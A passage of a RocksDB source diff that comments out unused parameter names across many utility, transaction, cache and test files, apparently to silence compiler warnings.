a/util/thread_local_test.cc b/util/thread_local_test.cc index 6fee5eaa574..789be83d8fd 100644 --- a/util/thread_local_test.cc +++ b/util/thread_local_test.cc @@ -535,7 +535,7 @@ TEST_F(ThreadLocalTest, CompareAndSwap) { namespace { -void* AccessThreadLocal(void* arg) { +void* AccessThreadLocal(void* /*arg*/) { TEST_SYNC_POINT("AccessThreadLocal:Start"); ThreadLocalPtr tlp; tlp.Reset(new std::string("hello RocksDB")); diff --git a/utilities/backupable/backupable_db.cc b/utilities/backupable/backupable_db.cc index 8921309e469..53f450dac43 100644 --- a/utilities/backupable/backupable_db.cc +++ b/utilities/backupable/backupable_db.cc @@ -754,7 +754,7 @@ Status BackupEngineImpl::CreateNewBackupWithMetadata( uint64_t sequence_number = 0; s = checkpoint.CreateCustomCheckpoint( db->GetDBOptions(), - [&](const std::string& src_dirname, const std::string& fname, + [&](const std::string& /*src_dirname*/, const std::string& /*fname*/, FileType) { // custom checkpoint will switch to calling copy_file_cb after it sees // NotSupported returned from link_file_cb. diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc index be20a8d9b3d..8b68c215310 100644 --- a/utilities/backupable/backupable_db_test.cc +++ b/utilities/backupable/backupable_db_test.cc @@ -57,7 +57,8 @@ class DummyDB : public StackableDB { } using DB::GetOptions; - virtual Options GetOptions(ColumnFamilyHandle* column_family) const override { + virtual Options GetOptions( + ColumnFamilyHandle* /*column_family*/) const override { return options_; } @@ -65,7 +66,7 @@ class DummyDB : public StackableDB { return DBOptions(options_); } - virtual Status EnableFileDeletions(bool force) override { + virtual Status EnableFileDeletions(bool /*force*/) override { EXPECT_TRUE(!deletions_enabled_); deletions_enabled_ = true; return Status::OK(); @@ -78,7 +79,7 @@ class DummyDB : public StackableDB { } virtual Status GetLiveFiles(std::vector& vec, uint64_t* mfs, - bool flush_memtable = true) override { + bool /*flush_memtable*/ = true) override { EXPECT_TRUE(!deletions_enabled_); vec = live_files_; *mfs = 100; @@ -135,7 +136,7 @@ class DummyDB : public StackableDB { } // To avoid FlushWAL called on stacked db which is nullptr - virtual Status FlushWAL(bool sync) override { return Status::OK(); } + virtual Status FlushWAL(bool /*sync*/) override { return Status::OK(); } std::vector live_files_; // pair @@ -521,7 +522,7 @@ class BackupableDBTest : public testing::Test { void OpenDBAndBackupEngineShareWithChecksum( bool destroy_old_data = false, bool dummy = false, - bool share_table_files = true, bool share_with_checksums = false) { + bool /*share_table_files*/ = true, bool share_with_checksums = false) { backupable_options_->share_files_with_checksum = share_with_checksums; OpenDBAndBackupEngine(destroy_old_data, dummy, share_with_checksums); } diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index f45a42f60a9..0b101e968f6 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -147,9 +147,9 @@ class BlobDB : public StackableDB { const Slice& key) override = 0; using rocksdb::StackableDB::Merge; - virtual Status Merge(const WriteOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value) override { + virtual Status Merge(const WriteOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, const Slice& /*value*/) override { return Status::NotSupported("Not supported operation in blob db."); } diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1dd72b6bc3a..e1648271170 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -143,8 +143,9 @@ void BlobDBFlushBeginListener::OnFlushBegin(DB* db, const FlushJobInfo& info) { } WalFilter::WalProcessingOption BlobReconcileWalFilter::LogRecordFound( - unsigned long long log_number, const std::string& log_file_name, - const WriteBatch& batch, WriteBatch* new_batch, bool* batch_changed) { + unsigned long long /*log_number*/, const std::string& /*log_file_name*/, + const WriteBatch& /*batch*/, WriteBatch* /*new_batch*/, + bool* /*batch_changed*/) { return WalFilter::WalProcessingOption::kContinueProcessing; } @@ -158,7 +159,7 @@ bool blobf_compare_ttl::operator()(const std::shared_ptr& lhs, } void EvictAllVersionsCompactionListener::InternalListener::OnCompaction( - int level, const Slice& key, + int /*level*/, const Slice& key, CompactionEventListener::CompactionListenerValueType value_type, const Slice& existing_value, const SequenceNumber& sn, bool is_new) { if (!is_new && @@ -354,7 +355,7 @@ void BlobDBImpl::StartBackgroundTasks() { void BlobDBImpl::Shutdown() { shutdown_.store(true); } -void BlobDBImpl::OnFlushBeginHandler(DB* db, const FlushJobInfo& info) { +void BlobDBImpl::OnFlushBeginHandler(DB* /*db*/, const FlushJobInfo& /*info*/) { if (shutdown_.load()) return; // a callback that happens too soon needs to be ignored @@ -1395,7 +1396,7 @@ std::pair BlobDBImpl::SanityCheck(bool aborted) { } std::pair BlobDBImpl::CloseSeqWrite( - std::shared_ptr bfile, bool aborted) { + std::shared_ptr bfile, bool /*aborted*/) { { WriteLock wl(&mutex_); @@ -2051,7 +2052,7 @@ bool BlobDBImpl::CallbackEvictsImpl(std::shared_ptr bfile) { } std::pair BlobDBImpl::RemoveTimerQ(TimerQueue* tq, - bool aborted) { + bool /*aborted*/) { WriteLock wl(&mutex_); for (auto itr = cb_threads_.begin(); itr != cb_threads_.end(); ++itr) { if ((*itr).get() != tq) continue; diff --git a/utilities/blob_db/blob_log_reader.cc b/utilities/blob_db/blob_log_reader.cc index 3931c8669b2..09c329a0565 100644 --- a/utilities/blob_db/blob_log_reader.cc +++ b/utilities/blob_db/blob_log_reader.cc @@ -41,7 +41,7 @@ Status Reader::ReadHeader(BlobLogHeader* header) { } Status Reader::ReadRecord(BlobLogRecord* record, ReadLevel level, - WALRecoveryMode wal_recovery_mode) { + WALRecoveryMode /*wal_recovery_mode*/) { record->Clear(); buffer_.clear(); backing_store_[0] = '\0'; diff --git a/utilities/checkpoint/checkpoint_impl.cc b/utilities/checkpoint/checkpoint_impl.cc index 0cdddbd628d..c1cea914b16 100644 --- a/utilities/checkpoint/checkpoint_impl.cc +++ b/utilities/checkpoint/checkpoint_impl.cc @@ -37,8 +37,8 @@ Status Checkpoint::Create(DB* db, Checkpoint** checkpoint_ptr) { return Status::OK(); } -Status Checkpoint::CreateCheckpoint(const std::string& checkpoint_dir, - uint64_t log_size_for_flush) { +Status Checkpoint::CreateCheckpoint(const std::string& /*checkpoint_dir*/, + uint64_t /*log_size_for_flush*/) { return Status::NotSupported(""); } diff --git a/utilities/checkpoint/checkpoint_test.cc b/utilities/checkpoint/checkpoint_test.cc index 56c8c6e0505..ef39541961e 100644 --- a/utilities/checkpoint/checkpoint_test.cc +++ b/utilities/checkpoint/checkpoint_test.cc @@ -370,7 +370,7 @@ TEST_F(CheckpointTest, CheckpointCFNoFlush) { Status s; // Take a snapshot rocksdb::SyncPoint::GetInstance()->SetCallBack( - "DBImpl::BackgroundCallFlush:start", [&](void* arg) { + "DBImpl::BackgroundCallFlush:start", [&](void* /*arg*/) { // Flush should never trigger. FAIL(); }); diff --git a/utilities/col_buf_decoder.h b/utilities/col_buf_decoder.h index e795e4ecdfc..918f87f9452 100644 --- a/utilities/col_buf_decoder.h +++ b/utilities/col_buf_decoder.h @@ -23,7 +23,7 @@ struct ColDeclaration; class ColBufDecoder { public: virtual ~ColBufDecoder() = 0; - virtual size_t Init(const char* src) { return 0; } + virtual size_t Init(const char* /*src*/) { return 0; } virtual size_t Decode(const char* src, char** dest) = 0; static ColBufDecoder* NewColBufDecoder(const ColDeclaration& col_declaration); diff --git a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc index 43a25293456..49760ba5a97 100644 --- a/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc +++ b/utilities/compaction_filters/remove_emptyvalue_compactionfilter.cc @@ -16,12 +16,11 @@ const char* RemoveEmptyValueCompactionFilter::Name() const { return "RemoveEmptyValueCompactionFilter"; } -bool RemoveEmptyValueCompactionFilter::Filter(int level, - const Slice& key, - const Slice& existing_value, - std::string* new_value, - bool* value_changed) const { - +bool RemoveEmptyValueCompactionFilter::Filter(int /*level*/, + const Slice& /*key*/, + const Slice& existing_value, + std::string* /*new_value*/, + bool* /*value_changed*/) const { // remove kv pairs that have empty values return existing_value.empty(); } diff --git a/utilities/document/document_db.cc b/utilities/document/document_db.cc index f7b5b3b2f3d..ac36f0e7696 100644 --- a/utilities/document/document_db.cc +++ b/utilities/document/document_db.cc @@ -1038,24 +1038,25 @@ class DocumentDBImpl : public DocumentDB { // RocksDB functions using DB::Get; - virtual Status Get(const ReadOptions& options, - ColumnFamilyHandle* column_family, const Slice& key, - PinnableSlice* value) override { + virtual Status Get(const ReadOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/, PinnableSlice* /*value*/) override { return Status::NotSupported(""); } - virtual Status Get(const ReadOptions& options, const Slice& key, - std::string* value) override { + virtual Status Get(const ReadOptions& /*options*/, const Slice& /*key*/, + std::string* /*value*/) override { return Status::NotSupported(""); } - virtual Status Write(const WriteOptions& options, - WriteBatch* updates) override { + virtual Status Write(const WriteOptions& /*options*/, + WriteBatch* /*updates*/) override { return Status::NotSupported(""); } - virtual Iterator* NewIterator(const ReadOptions& options, - ColumnFamilyHandle* column_family) override { + virtual Iterator* NewIterator( + const ReadOptions& /*options*/, + ColumnFamilyHandle* /*column_family*/) override { return nullptr; } - virtual Iterator* NewIterator(const ReadOptions& options) override { + virtual Iterator* NewIterator(const ReadOptions& /*options*/) override { return nullptr; } diff --git a/utilities/merge_operators/max.cc b/utilities/merge_operators/max.cc index 06e233fe89d..ff7b2a75a34 100644 --- a/utilities/merge_operators/max.cc +++ b/utilities/merge_operators/max.cc @@ -36,9 +36,9 @@ class MaxOperator : public MergeOperator { return true; } - virtual bool PartialMerge(const Slice& key, const Slice& left_operand, + virtual bool PartialMerge(const Slice& /*key*/, const Slice& left_operand, const Slice& right_operand, std::string* new_value, - Logger* logger) const override { + Logger* /*logger*/) const override { if (left_operand.compare(right_operand) >= 0) { new_value->assign(left_operand.data(), left_operand.size()); } else { @@ -47,10 +47,10 @@ class MaxOperator : public MergeOperator { return true; } - virtual bool PartialMergeMulti(const Slice& key, + virtual bool PartialMergeMulti(const Slice& /*key*/, const std::deque& operand_list, std::string* new_value, - Logger* logger) const override { + Logger* /*logger*/) const override { Slice max; for (const auto& operand : operand_list) { if (max.compare(operand) < 0) { diff --git a/utilities/merge_operators/put.cc b/utilities/merge_operators/put.cc index 7f206ad3b09..fcbf67d9b03 100644 --- a/utilities/merge_operators/put.cc +++ b/utilities/merge_operators/put.cc @@ -22,11 +22,10 @@ namespace { // anonymous namespace // From the client-perspective, semantics are the same. class PutOperator : public MergeOperator { public: - virtual bool FullMerge(const Slice& key, - const Slice* existing_value, + virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, const std::deque& operand_sequence, std::string* new_value, - Logger* logger) const override { + Logger* /*logger*/) const override { // Put basically only looks at the current/latest value assert(!operand_sequence.empty()); assert(new_value != nullptr); @@ -34,20 +33,18 @@ class PutOperator : public MergeOperator { return true; } - virtual bool PartialMerge(const Slice& key, - const Slice& left_operand, - const Slice& right_operand, - std::string* new_value, - Logger* logger) const override { + virtual bool PartialMerge(const Slice& /*key*/, const Slice& /*left_operand*/, + const Slice& right_operand, std::string* new_value, + Logger* /*logger*/) const override { new_value->assign(right_operand.data(), right_operand.size()); return true; } using MergeOperator::PartialMergeMulti; - virtual bool PartialMergeMulti(const Slice& key, + virtual bool PartialMergeMulti(const Slice& /*key*/, const std::deque& operand_list, - std::string* new_value, Logger* logger) const - override { + std::string* new_value, + Logger* /*logger*/) const override { new_value->assign(operand_list.back().data(), operand_list.back().size()); return true; } @@ -58,10 +55,10 @@ class PutOperator : public MergeOperator { }; class PutOperatorV2 : public PutOperator { - virtual bool FullMerge(const Slice& key, const Slice* existing_value, - const std::deque& operand_sequence, - std::string* new_value, - Logger* logger) const override { + virtual bool FullMerge(const Slice& /*key*/, const Slice* /*existing_value*/, + const std::deque& /*operand_sequence*/, + std::string* /*new_value*/, + Logger* /*logger*/) const override { assert(false); return false; } diff --git a/utilities/merge_operators/string_append/stringappend.cc b/utilities/merge_operators/string_append/stringappend.cc index ff19348f07b..e3e755dfd8c 100644 --- a/utilities/merge_operators/string_append/stringappend.cc +++ b/utilities/merge_operators/string_append/stringappend.cc @@ -21,12 +21,10 @@ StringAppendOperator::StringAppendOperator(char delim_char) } // Implementation for the merge operation (concatenates two strings) -bool StringAppendOperator::Merge(const Slice& key, +bool StringAppendOperator::Merge(const Slice& /*key*/, const Slice* existing_value, - const Slice& value, - std::string* new_value, - Logger* logger) const { - + const Slice& value, std::string* new_value, + Logger* /*logger*/) const { // Clear the *new_value for writing. assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/string_append/stringappend2.cc b/utilities/merge_operators/string_append/stringappend2.cc index 2d7b7423ce8..6e46d80a139 100644 --- a/utilities/merge_operators/string_append/stringappend2.cc +++ b/utilities/merge_operators/string_append/stringappend2.cc @@ -68,16 +68,16 @@ bool StringAppendTESTOperator::FullMergeV2( } bool StringAppendTESTOperator::PartialMergeMulti( - const Slice& key, const std::deque& operand_list, - std::string* new_value, Logger* logger) const { + const Slice& /*key*/, const std::deque& /*operand_list*/, + std::string* /*new_value*/, Logger* /*logger*/) const { return false; } // A version of PartialMerge that actually performs "partial merging". // Use this to simulate the exact behaviour of the StringAppendOperator. bool StringAppendTESTOperator::_AssocPartialMergeMulti( - const Slice& key, const std::deque& operand_list, - std::string* new_value, Logger* logger) const { + const Slice& /*key*/, const std::deque& operand_list, + std::string* new_value, Logger* /*logger*/) const { // Clear the *new_value for writing assert(new_value); new_value->clear(); diff --git a/utilities/merge_operators/uint64add.cc b/utilities/merge_operators/uint64add.cc index d7821737517..dc761e74b20 100644 --- a/utilities/merge_operators/uint64add.cc +++ b/utilities/merge_operators/uint64add.cc @@ -20,10 +20,8 @@ namespace { // anonymous namespace // Implemented as an AssociativeMergeOperator for simplicity and example. class UInt64AddOperator : public AssociativeMergeOperator { public: - virtual bool Merge(const Slice& key, - const Slice* existing_value, - const Slice& value, - std::string* new_value, + virtual bool Merge(const Slice& /*key*/, const Slice* existing_value, + const Slice& value, std::string* new_value, Logger* logger) const override { uint64_t orig_value = 0; if (existing_value){ diff --git a/utilities/object_registry_test.cc b/utilities/object_registry_test.cc index 40fb387bc93..fe69d9a3959 100644 --- a/utilities/object_registry_test.cc +++ b/utilities/object_registry_test.cc @@ -18,13 +18,14 @@ class EnvRegistryTest : public testing::Test { int EnvRegistryTest::num_a = 0; int EnvRegistryTest::num_b = 0; -static Registrar test_reg_a("a://.*", [](const std::string& uri, - std::unique_ptr* env_guard) { - ++EnvRegistryTest::num_a; - return Env::Default(); -}); +static Registrar test_reg_a("a://.*", + [](const std::string& /*uri*/, + std::unique_ptr* /*env_guard*/) { + ++EnvRegistryTest::num_a; + return Env::Default(); + }); -static Registrar test_reg_b("b://.*", [](const std::string& uri, +static Registrar test_reg_b("b://.*", [](const std::string& /*uri*/, std::unique_ptr* env_guard) { ++EnvRegistryTest::num_b; // Env::Default() is a singleton so we can't grant ownership directly to the diff --git a/utilities/options/options_util_test.cc b/utilities/options/options_util_test.cc index 86b382cfab5..39fbec52b47 100644 --- a/utilities/options/options_util_test.cc +++ b/utilities/options/options_util_test.cc @@ -102,22 +102,22 @@ class DummyTableFactory : public TableFactory { virtual const char* Name() const { return "DummyTableFactory"; } - virtual Status NewTableReader(const TableReaderOptions& table_reader_options, - unique_ptr&& file, - uint64_t file_size, - unique_ptr* table_reader, - bool prefetch_index_and_filter_in_cache) const { + virtual Status NewTableReader( + const TableReaderOptions& /*table_reader_options*/, + unique_ptr&& /*file*/, uint64_t /*file_size*/, + unique_ptr* /*table_reader*/, + bool /*prefetch_index_and_filter_in_cache*/) const { return Status::NotSupported(); } virtual TableBuilder* NewTableBuilder( - const TableBuilderOptions& table_builder_options, - uint32_t column_family_id, WritableFileWriter* file) const { + const TableBuilderOptions& /*table_builder_options*/, + uint32_t /*column_family_id*/, WritableFileWriter* /*file*/) const { return nullptr; } - virtual Status SanitizeOptions(const DBOptions& db_opts, - const ColumnFamilyOptions& cf_opts) const { + virtual Status SanitizeOptions(const DBOptions& /*db_opts*/, + const ColumnFamilyOptions& /*cf_opts*/) const { return Status::NotSupported(); } @@ -129,15 +129,15 @@ class DummyMergeOperator : public MergeOperator { DummyMergeOperator() {} virtual ~DummyMergeOperator() {} - virtual bool FullMergeV2(const MergeOperationInput& merge_in, - MergeOperationOutput* merge_out) const override { + virtual bool FullMergeV2(const MergeOperationInput& /*merge_in*/, + MergeOperationOutput* /*merge_out*/) const override { return false; } - virtual bool PartialMergeMulti(const Slice& key, - const std::deque& operand_list, - std::string* new_value, - Logger* logger) const override { + virtual bool PartialMergeMulti(const Slice& /*key*/, + const std::deque& /*operand_list*/, + std::string* /*new_value*/, + Logger* /*logger*/) const override { return false; } @@ -156,10 +156,10 @@ class DummySliceTransform : public SliceTransform { virtual Slice Transform(const Slice& src) const { return src; } // determine whether this is a valid src upon the function applies - virtual bool InDomain(const Slice& src) const { return false; } + virtual bool InDomain(const Slice& /*src*/) const { return false; } // determine whether dst=Transform(src) for some src - virtual bool InRange(const Slice& dst) const { return false; } + virtual bool InRange(const Slice& /*dst*/) const { return false; } }; } // namespace diff --git a/utilities/persistent_cache/block_cache_tier_file.cc b/utilities/persistent_cache/block_cache_tier_file.cc index 85e0610b7e4..fac8d75e29a 100644 --- a/utilities/persistent_cache/block_cache_tier_file.cc +++ b/utilities/persistent_cache/block_cache_tier_file.cc @@ -277,7 +277,7 @@ WriteableCacheFile::~WriteableCacheFile() { ClearBuffers(); } -bool WriteableCacheFile::Create(const bool enable_direct_writes, +bool WriteableCacheFile::Create(const bool /*enable_direct_writes*/, const bool enable_direct_reads) { WriteLock _(&rwlock_); diff --git a/utilities/persistent_cache/block_cache_tier_file.h b/utilities/persistent_cache/block_cache_tier_file.h index 3922136d67e..ef5dbab0408 100644 --- a/utilities/persistent_cache/block_cache_tier_file.h +++ b/utilities/persistent_cache/block_cache_tier_file.h @@ -103,13 +103,15 @@ class BlockCacheFile : public LRUElement { virtual ~BlockCacheFile() {} // append key/value to file and return LBA locator to user - virtual bool Append(const Slice& key, const Slice& val, LBA* const lba) { + virtual bool Append(const Slice& /*key*/, const Slice& /*val*/, + LBA* const /*lba*/) { assert(!"not implemented"); return false; } // read from the record locator (LBA) and return key, value and status - virtual bool Read(const LBA& lba, Slice* key, Slice* block, char* scratch) { + virtual bool Read(const LBA& /*lba*/, Slice* /*key*/, Slice* /*block*/, + char* /*scratch*/) { assert(!"not implemented"); return false; } diff --git a/utilities/persistent_cache/hash_table_test.cc b/utilities/persistent_cache/hash_table_test.cc index 1a6df4e6144..6fe5a596545 100644 --- a/utilities/persistent_cache/hash_table_test.cc +++ b/utilities/persistent_cache/hash_table_test.cc @@ -43,7 +43,7 @@ struct HashTableTest : public testing::Test { } }; - static void ClearNode(Node node) {} + static void ClearNode(Node /*node*/) {} HashTable map_; }; @@ -73,7 +73,7 @@ struct EvictableHashTableTest : public testing::Test { } }; - static void ClearNode(Node* node) {} + static void ClearNode(Node* /*node*/) {} EvictableHashTable map_; }; diff --git a/utilities/persistent_cache/persistent_cache_test.h b/utilities/persistent_cache/persistent_cache_test.h index 77fd172ba08..37e842f2e2a 100644 --- a/utilities/persistent_cache/persistent_cache_test.h +++ b/utilities/persistent_cache/persistent_cache_test.h @@ -233,8 +233,8 @@ class PersistentCacheDBTest : public DBTestBase { // insert data to table void Insert(const Options& options, - const BlockBasedTableOptions& table_options, const int num_iter, - std::vector* values) { + const BlockBasedTableOptions& /*table_options*/, + const int num_iter, std::vector* values) { CreateAndReopenWithCF({"pikachu"}, options); // default column family doesn't have block cache Options no_block_cache_opts; diff --git a/utilities/persistent_cache/persistent_cache_tier.cc b/utilities/persistent_cache/persistent_cache_tier.cc index 0f500e87127..732762a1652 100644 --- a/utilities/persistent_cache/persistent_cache_tier.cc +++ b/utilities/persistent_cache/persistent_cache_tier.cc @@ -75,12 +75,12 @@ Status PersistentCacheTier::Close() { return Status::OK(); } -bool PersistentCacheTier::Reserve(const size_t size) { +bool PersistentCacheTier::Reserve(const size_t /*size*/) { // default implementation is a pass through return true; } -bool PersistentCacheTier::Erase(const Slice& key) { +bool PersistentCacheTier::Erase(const Slice& /*key*/) { // default implementation is a pass through since not all cache tiers might // support erase return true; diff --git a/utilities/persistent_cache/volatile_tier_impl.cc b/utilities/persistent_cache/volatile_tier_impl.cc index d190a210282..177fc916904 100644 --- a/utilities/persistent_cache/volatile_tier_impl.cc +++ b/utilities/persistent_cache/volatile_tier_impl.cc @@ -106,7 +106,7 @@ Status VolatileCacheTier::Lookup(const Slice& page_key, return Status::NotFound("key not found in volatile cache"); } -bool VolatileCacheTier::Erase(const Slice& key) { +bool VolatileCacheTier::Erase(const Slice& /*key*/) { assert(!"not supported"); return true; } diff --git a/utilities/redis/redis_list_iterator.h b/utilities/redis/redis_list_iterator.h index 73907ddf8c4..1c4bc11e590 100644 --- a/utilities/redis/redis_list_iterator.h +++ b/utilities/redis/redis_list_iterator.h @@ -288,7 +288,7 @@ class RedisListIterator { /// Will throw an exception based on the passed-in message. /// This function is guaranteed to STOP THE CONTROL-FLOW. /// (i.e.: you do not have to call "return" after calling ThrowError) - void ThrowError(const char* const msg = NULL) { + void ThrowError(const char* const /*msg*/ = NULL) { // TODO: For now we ignore the msg parameter. This can be expanded later. throw RedisListException(); } diff --git a/utilities/simulator_cache/sim_cache.cc b/utilities/simulator_cache/sim_cache.cc index 335ac9896d0..6c0adf6a740 100644 --- a/utilities/simulator_cache/sim_cache.cc +++ b/utilities/simulator_cache/sim_cache.cc @@ -43,7 +43,7 @@ class SimCacheImpl : public SimCache { Handle* h = key_only_cache_->Lookup(key); if (h == nullptr) { key_only_cache_->Insert(key, nullptr, charge, - [](const Slice& k, void* v) {}, nullptr, + [](const Slice& /*k*/, void* /*v*/) {}, nullptr, priority); } else { key_only_cache_->Release(h); diff --git a/utilities/simulator_cache/sim_cache_test.cc b/utilities/simulator_cache/sim_cache_test.cc index 01b328c783e..d01cdd5304d 100644 --- a/utilities/simulator_cache/sim_cache_test.cc +++ b/utilities/simulator_cache/sim_cache_test.cc @@ -39,7 +39,7 @@ class SimCacheTest : public DBTestBase { return options; } - void InitTable(const Options& options) { + void InitTable(const Options& /*options*/) { std::string value(kValueSize, 'a'); for (size_t i = 0; i < kNumBlocks * 2; i++) { ASSERT_OK(Put(ToString(i), value.c_str())); diff --git a/utilities/spatialdb/spatial_db.cc b/utilities/spatialdb/spatial_db.cc index 539ddd06ee0..a9b990ee20f 100644 --- a/utilities/spatialdb/spatial_db.cc +++ b/utilities/spatialdb/spatial_db.cc @@ -704,7 +704,7 @@ DBOptions GetDBOptionsFromSpatialDBOptions(const SpatialDBOptions& options) { return db_options; } -ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& options, +ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& /*options*/, std::shared_ptr block_cache) { ColumnFamilyOptions column_family_options; column_family_options.write_buffer_size = 128 * 1024 * 1024; // 128MB diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.cc b/utilities/table_properties_collectors/compact_on_deletion_collector.cc index 304cdfff889..625318609d9 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.cc @@ -39,10 +39,11 @@ void CompactOnDeletionCollector::Reset() { // @params key the user key that is inserted into the table. // @params value the value that is inserted into the table. // @params file_size file size up to now -Status CompactOnDeletionCollector::AddUserKey( - const Slice& key, const Slice& value, - EntryType type, SequenceNumber seq, - uint64_t file_size) { +Status CompactOnDeletionCollector::AddUserKey(const Slice& /*key*/, + const Slice& /*value*/, + EntryType type, + SequenceNumber /*seq*/, + uint64_t /*file_size*/) { if (need_compaction_) { // If the output file already needs to be compacted, skip the check. return Status::OK(); @@ -77,7 +78,7 @@ Status CompactOnDeletionCollector::AddUserKey( TablePropertiesCollector* CompactOnDeletionCollectorFactory::CreateTablePropertiesCollector( - TablePropertiesCollectorFactory::Context context) { + TablePropertiesCollectorFactory::Context /*context*/) { return new CompactOnDeletionCollector( sliding_window_size_, deletion_trigger_); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector.h b/utilities/table_properties_collectors/compact_on_deletion_collector.h index bd240e5170d..34cd633659b 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector.h +++ b/utilities/table_properties_collectors/compact_on_deletion_collector.h @@ -60,7 +60,7 @@ class CompactOnDeletionCollector : public TablePropertiesCollector { // for writing the properties block. // @params properties User will add their collected statistics to // `properties`. - virtual Status Finish(UserCollectedProperties* properties) override { + virtual Status Finish(UserCollectedProperties* /*properties*/) override { Reset(); return Status::OK(); } diff --git a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc index 3c946bf414f..eabc2271c48 100644 --- a/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc +++ b/utilities/table_properties_collectors/compact_on_deletion_collector_test.cc @@ -20,7 +20,7 @@ #include "util/random.h" #include "utilities/table_properties_collectors/compact_on_deletion_collector.h" -int main(int argc, char** argv) { +int main(int /*argc*/, char** /*argv*/) { const int kWindowSizes[] = {1000, 10000, 10000, 127, 128, 129, 255, 256, 257, 2, 10000}; const int kDeletionTriggers[] = diff --git a/utilities/transactions/optimistic_transaction_impl.cc b/utilities/transactions/optimistic_transaction_impl.cc index 5652189bc35..bae0d609f29 100644 --- a/utilities/transactions/optimistic_transaction_impl.cc +++ b/utilities/transactions/optimistic_transaction_impl.cc @@ -133,7 +133,7 @@ Status OptimisticTransactionImpl::CheckTransactionForConflicts(DB* db) { true /* cache_only */); } -Status OptimisticTransactionImpl::SetName(const TransactionName& name) { +Status OptimisticTransactionImpl::SetName(const TransactionName& /*name*/) { return Status::InvalidArgument("Optimistic transactions cannot be named."); } diff --git a/utilities/transactions/optimistic_transaction_impl.h b/utilities/transactions/optimistic_transaction_impl.h index 6baec6962ec..3618c69326e 100644 --- a/utilities/transactions/optimistic_transaction_impl.h +++ b/utilities/transactions/optimistic_transaction_impl.h @@ -67,8 +67,8 @@ class OptimisticTransactionImpl : public TransactionBaseImpl { void Clear() override; - void UnlockGetForUpdate(ColumnFamilyHandle* column_family, - const Slice& key) override { + void UnlockGetForUpdate(ColumnFamilyHandle* /*column_family*/, + const Slice& /*key*/) override { // Nothing to unlock. } diff --git a/utilities/transactions/transaction_base.h b/utilities/transactions/transaction_base.h index 1514836489e..105da0ab9e2 100644 --- a/utilities/transactions/transaction_base.h +++ b/utilities/transactions/transaction_base.h @@ -165,7 +165,7 @@ class TransactionBaseImpl : public Transaction { WriteBatchWithIndex* GetWriteBatch() override; - virtual void SetLockTimeout(int64_t timeout) override { /* Do nothing */ + virtual void SetLockTimeout(int64_t /*timeout*/) override { /* Do nothing */ } const Snapshot* GetSnapshot() const override { diff --git a/utilities/transactions/transaction_impl.cc b/utilities/transactions/transaction_impl.cc index 408b15bcd3d..2e3d69633bf 100644 --- a/utilities/transactions/transaction_impl.cc +++ b/utilities/transactions/transaction_impl.cc @@ -367,12 +367,12 @@ Status TransactionImpl::LockBatch(WriteBatch* batch, } virtual Status PutCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /*value*/) override { RecordKey(column_family_id, key); return Status::OK(); } virtual Status MergeCF(uint32_t column_family_id, const Slice& key, - const Slice& value) override { + const Slice& /*value*/) override { RecordKey(column_family_id, key); return Status::OK(); } diff --git a/utilities/transactions/transaction_impl.h b/utilities/transactions/transaction_impl.h index 01f8f4b2a2d..79db430e759 100644 --- a/utilities/transactions/transaction_impl.h +++ b/utilities/transactions/transaction_impl.h @@ -180,7 +180,7 @@ class TransactionCallback : public WriteCallback { public: explicit TransactionCallback(TransactionImpl* txn) : txn_(txn) {} - Status Callback(DB* db) override { + Status Callback(DB* /*db*/) override { if (txn_->IsExpired()) { return Status::Expired(); } else { diff --git a/utilities/transactions/transaction_test.cc b/utilities/transactions/transaction_test.cc index ce01388f8a8..7b2f8a3c768 100644 --- a/utilities/transactions/transaction_test.cc +++ b/utilities/transactions/transaction_test.cc @@ -211,7 +211,7 @@ TEST_P(TransactionTest, WaitingTxn) { ASSERT_TRUE(txn2); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* arg) { + "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", [&](void* /*arg*/) { std::string key; uint32_t cf_id; std::vector wait = txn2->GetWaitingTxns(&cf_id, &key); @@ -433,7 +433,7 @@ TEST_P(TransactionTest, DeadlockCycleShared) { std::atomic checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* arg) { checkpoints.fetch_add(1); }); + [&](void* /*arg*/) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the leaf transactions to block and hold everyone back. @@ -501,7 +501,7 @@ TEST_P(TransactionTest, DeadlockCycle) { std::atomic checkpoints(0); rocksdb::SyncPoint::GetInstance()->SetCallBack( "TransactionLockMgr::AcquireWithTimeout:WaitingTxn", - [&](void* arg) { checkpoints.fetch_add(1); }); + [&](void* /*arg*/) { checkpoints.fetch_add(1); }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); // We want the last transaction in the chain to block and hold everyone @@ -4423,7 +4423,7 @@ TEST_P(TransactionTest, ExpiredTransactionDataRace1) { rocksdb::SyncPoint::GetInstance()->LoadDependency( 